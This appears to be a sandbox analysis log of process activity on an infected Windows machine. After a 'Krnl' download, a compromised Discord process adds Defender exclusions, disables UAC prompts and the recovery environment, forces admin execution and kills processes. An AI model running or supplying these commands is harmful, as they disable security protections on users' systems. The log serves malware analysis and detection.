C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7744 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7660 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=97 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6888 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=98 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2420 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=99 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8120 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3108 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7392 /prefetch:83⤵
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /v "C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" /t REG_SZ /d "RUNASADMIN" /f4⤵
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7192 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7140 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7712 /prefetch:83⤵
-
-
C:\Users\Admin\Downloads\Everything-1.4.1.1022.x86-Setup.exe"C:\Users\Admin\Downloads\Everything-1.4.1.1022.x86-Setup.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\nsy5316.tmp\Everything\Everything.exe"C:\Users\Admin\AppData\Local\Temp\nsy5316.tmp\Everything\Everything.exe" -install "C:\Program Files (x86)\Everything" -install-options " -app-data -install-run-on-system-startup -install-service -disable-run-as-admin -install-folder-context-menu -install-start-menu-shortcuts -install-desktop-shortcut -uninstall-url-protocol -install-efu-association -install-language 1036 -save-install-options 0"4⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Program Files (x86)\Everything\Everything.exe"C:\Program Files (x86)\Everything\Everything.exe" -app-data -install-run-on-system-startup -install-service -disable-run-as-admin -install-folder-context-menu -install-start-menu-shortcuts -install-desktop-shortcut -uninstall-url-protocol -install-efu-association -install-language 1036 -save-install-options 05⤵
- Executes dropped EXE
- Adds Run key to start application
-
-
-
C:\Program Files (x86)\Everything\Everything.exe"C:\Program Files (x86)\Everything\Everything.exe" -disable-update-notification -uninstall-quick-launch-shortcut -no-choose-volumes -language 10364⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\Everything\Everything.exe"C:\Program Files (x86)\Everything\Everything.exe"4⤵
- Executes dropped EXE
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=105 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8176 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=106 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6560 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8104 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7432 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6944 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7100 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7776 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7928 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4588 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2660 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7248 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=116 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2356 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=117 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2340 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=118 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8120 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=119 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8012 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=120 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1504 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7892 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=960 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7276 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5916 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2356 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=126 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6452 /prefetch:13⤵
-
-
C:\Users\Admin\Downloads\MBSetup-20AB4836.exe"C:\Users\Admin\Downloads\MBSetup-20AB4836.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=128 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7076 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=127 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7204 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6748 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6876 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7036 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6900 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5988 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7008 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2092 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7396 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2328 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=138 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6672 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=139 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6556 /prefetch:13⤵
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Krnl\" -spe -an -ai#7zMap30787:70:7zEvent50272⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Downloads\Krnl\KrnlBootStrapper.exe"C:\Users\Admin\Downloads\Krnl\KrnlBootStrapper.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\Downloads\Krnl\KrnlBootStrapper.exe"C:\Users\Admin\Downloads\Krnl\KrnlBootStrapper.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\Downloads\Krnl\KrnlBootStrapper.exe"C:\Users\Admin\Downloads\Krnl\KrnlBootStrapper.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\Downloads\Krnl\KrnlBootStrapper.exe"C:\Users\Admin\Downloads\Krnl\KrnlBootStrapper.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\Downloads\Krnl\KrnlBootStrapper.exe"C:\Users\Admin\Downloads\Krnl\KrnlBootStrapper.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\Downloads\Krnl\KrnlBootStrapper.exe"C:\Users\Admin\Downloads\Krnl\KrnlBootStrapper.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\Downloads\Krnl\KrnlBootStrapper.exe"C:\Users\Admin\Downloads\Krnl\KrnlBootStrapper.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\Downloads\Krnl\KrnlBootStrapper.exe"C:\Users\Admin\Downloads\Krnl\KrnlBootStrapper.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\Downloads\Krnl\KrnlBootStrapper.exe"C:\Users\Admin\Downloads\Krnl\KrnlBootStrapper.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\Downloads\Krnl\KrnlBootStrapper.exe"C:\Users\Admin\Downloads\Krnl\KrnlBootStrapper.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Drops startup file
- Checks SCSI registry key(s)
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Discord\Update.exe"C:\Users\Admin\AppData\Local\Discord\Update.exe" --processStart Discord.exe2⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exeC:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Roaming\discord /prefetch:7 --no-rate-limit --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Roaming\discord\Crashpad --url=https://sentry.io/api/146342/minidump/?sentry_key=384ce4413de74fe0be270abe03b2b35a "--annotation=_companyName=Discord Inc." --annotation=_productName=Discord --annotation=_version=1.0.9008 --annotation=prod=Electron --annotation=ver=13.6.6 --initial-client-data=0x488,0x48c,0x490,0x484,0x494,0x7a83850,0x7a83860,0x7a8386c4⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=gpu-process --field-trial-handle=1704,2573454940150220021,17150509419216090028,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1712 /prefetch:24⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=renderer --autoplay-policy=no-user-gesture-required --field-trial-handle=1704,2573454940150220021,17150509419216090028,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --lang=en-US --app-user-model-id=com.squirrel.Discord.Discord --app-path="C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\resources\app.asar" --no-sandbox --no-zygote --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2168 /prefetch:14⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1704,2573454940150220021,17150509419216090028,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:84⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=renderer --autoplay-policy=no-user-gesture-required --field-trial-handle=1704,2573454940150220021,17150509419216090028,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --disable-gpu-compositing --lang=en-US --app-user-model-id=com.squirrel.Discord.Discord --app-path="C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\resources\app.asar" --no-sandbox --no-zygote --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1 --enable-node-leakage-in-renderers4⤵
- Executes dropped EXE
- Checks computer location settings
- Drops startup file
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /q /d /s /c "C:\Program^ Files\NVIDIA^ Corporation\NVSMI\nvidia-smi.exe"5⤵
-
-
C:\Windows\SysWOW64\net.exenet session5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 session6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "%windir%\System32\reg.exe ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /v "C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" /t REG_SZ /d "RUNASADMIN" /f"5⤵
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /v "C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" /t REG_SZ /d "RUNASADMIN" /f6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:APPDATA -Force"5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:APPDATA -Force6⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powercfg /hibernate off"5⤵
-
C:\Windows\SysWOW64\powercfg.exepowercfg /hibernate off6⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powercfg /setactive 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c"5⤵
-
C:\Windows\SysWOW64\powercfg.exepowercfg /setactive 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c6⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "reagentc.exe /disable"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:LOCALAPPDATA -Force"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "%windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "taskkill /f /im SoundServices.exe"5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SoundServices.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1704,2573454940150220021,17150509419216090028,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3956 /prefetch:84⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1704,2573454940150220021,17150509419216090028,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3928 /prefetch:84⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Discord4⤵
- Modifies registry key
-
-
